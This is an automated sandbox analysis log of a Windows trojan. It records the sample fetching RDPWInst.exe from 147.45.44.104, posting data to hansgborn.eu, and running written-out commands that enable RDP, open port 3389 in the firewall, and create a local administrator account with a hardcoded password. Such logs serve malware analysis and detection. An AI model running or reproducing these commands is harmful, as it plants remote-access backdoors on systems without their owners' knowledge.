                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_0043CF60 InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,9_2_0043CF60
                            Source: global trafficHTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                            Source: global trafficDNS traffic detected: DNS query: hansgborn.eu
                            Source: unknownHTTP traffic detected: POST /core/receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: hansgborn.euContent-Length: 190Expect: 100-continueConnection: Keep-Alive
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002B3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
                            Source: 67065b4c84713_Javiles.exeString found in binary or memory: http://api.ipify.org
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp, 67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002FA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp, 67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002FA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.orgd
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002FB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hansgborn.eu
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002FB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hansgborn.eud
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2171602944.0000000002810000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2171602944.0000000002810000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: RDPWInst.exe, RDPWInst.exe, 00000009.00000000.1765768816.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drString found in binary or memory: http://stascorp.com/load/1-1-0-62
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002B4B000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000009.00000000.1765908730.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rdpwrap.dll.9.drString found in binary or memory: http://stascorp.comDVarFileInfo$
                            Source: RDPWInst.exe, 00000009.00000000.1765908730.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drString found in binary or memory: http://www.apache.org/licenses/
                            Source: RDPWInst.exe, 00000009.00000000.1765908730.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://cloudflare-ipfs.com/ipfs/Qmd3W5DuhgHirLHGVixi6V76LhCkZUz6pnFt5AJBiyvHye/avatar/
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/bchavez/Bogus
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/bchavez/Bogus.
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/bchavez/Bogus/issues/115
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/bchavez/Bogus/issues/54
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/bchavez/Bogus/wiki/Bogus-Premium
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/bchavez/Bogus:
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2171602944.0000000002810000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/lontivero/Open.Nat/issuesOAlso
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002FB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hansgborn.eu
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hansgborn.eu/core/receive.php
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002FB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hansgborn.eu/core/receive.phpd
                            Source: 67065b4c84713_Javiles.exeString found in binary or memory: https://hansgborn.eu/core/receive.phpihttp://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://loremflickr.com
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://picsum.photos
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://placeimg.com
                            Source: RDPWInst.exeString found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
                            Source: RDPWInst.exe, 00000009.00000000.1765768816.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://via.placeholder.com/
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.2
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Windows\System32\rfxvmt.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeCode function: 0_2_026CE4900_2_026CE490
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeCode function: 0_2_026CDBC00_2_026CDBC0
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeCode function: 0_2_026CD8780_2_026CD878
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_0040360C9_2_0040360C
                            Source: Joe Sandbox ViewDropped File: C:\Program Files\RDP Wrapper\rdpwrap.dll 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 00406BE0 appears 36 times
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 00404CDC appears 74 times
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 00407450 appears 135 times
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 004042F8 appears 74 times
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (console) x86-64, for MS Windows
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2171602944.0000000002810000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameOpen.Nat.dll2 vs 67065b4c84713_Javiles.exe
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBogus.dll, vs 67065b4c84713_Javiles.exe
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002B4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRDPWInst.exeB vs 67065b4c84713_Javiles.exe
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000000.1704057773.0000000000568000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRDPCreator.exe4 vs 67065b4c84713_Javiles.exe
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2170944182.0000000000C4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 67065b4c84713_Javiles.exe
                            Source: 67065b4c84713_Javiles.exeBinary or memory string: OriginalFilenameRDPCreator.exe4 vs 67065b4c84713_Javiles.exe
                            Source: unknownDriver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys
                            Source: 67065b4c84713_Javiles.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /f
                            Source: 67065b4c84713_Javiles.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: 0.2.67065b4c84713_Javiles.exe.5020000.1.raw.unpack, LicenseVerifier.csBase64 encoded string: 'vBgOPQiBhRR22ClUzIBJCmxcaOWfuAweUNpodRuZWDn8whviOe4JdA/sjzqw54KGh1qHJIc7JY5sGTCxNZQiSuyZQ6iHK2ykmU0Yb+QBvbqG33x2R7Di8MoNA1Tv2fX7SSny++IKEOQEEvwYhYr6oRU8sVItMcybUjiaaSw1rbU='
                            Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@47/9@2/5
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_0043BF00 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,9_2_0043BF00
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_0040FAE8 GetDiskFreeSpaceW,9_2_0040FAE8
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_0043DC64 LoadLibraryExW,FindResourceW,LoadResource,FreeLibrary,9_2_0043DC64
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_0043B1A8 OpenSCManagerW,GetLastError,OpenServiceW,CloseServiceHandle,GetLastError,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,CloseServiceHandle,9_2_0043B1A8
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Program Files\RDP WrapperJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2920:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5596:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeFile created: C:\Users\user\AppData\Local\Temp\RDPWInst.exeJump to behavior
                            Source: Yara matchFile source: 9.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000009.00000000.1765768816.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED
                            Source: 67065b4c84713_Javiles.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: 67065b4c84713_Javiles.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NumberOfCores FROM Win32_Processor
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: 67065b4c84713_Javiles.exeReversingLabs: Detection: 87%
                            Source: RDPWInst.exeString found in binary or memory: Link: http://stascorp.com/load/1-1-0-62
                            Source: 67065b4c84713_Javiles.exeString found in binary or memory: /add
                            Source: unknownProcess created: C:\Users\user\Desktop\67065b4c84713_Javiles.exe "C:\Users\user\Desktop\67065b4c84713_Javiles.exe"
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /f
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRemoteDesktop" /t REG_DWORD /d 0 /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRemoteDesktop" /t REG_DWORD /d 0 /f
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user JustonThompson G2ywh4BZ30yu /add
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user JustonThompson G2ywh4BZ30yu /add
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user JustonThompson G2ywh4BZ30yu /add
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup "Remote Desktop Users" JustonThompson /add
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" JustonThompson /add
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" JustonThompson /add
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup "Administrators" JustonThompson /add
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" JustonThompson /add
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" JustonThompson /add
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /fJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRemoteDesktop" /t REG_DWORD /d 0 /fJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -iJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRemoteDesktop" /t REG_DWORD /d 0 /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -iJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allowJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user JustonThompson G2ywh4BZ30yu /addJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user JustonThompson G2ywh4BZ30yu /addJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroupJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroupJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" JustonThompson /addJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" JustonThompson /addJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" JustonThompson /addJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" JustonThompson /addJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeSection loaded: winnsi.dllJump to behavior
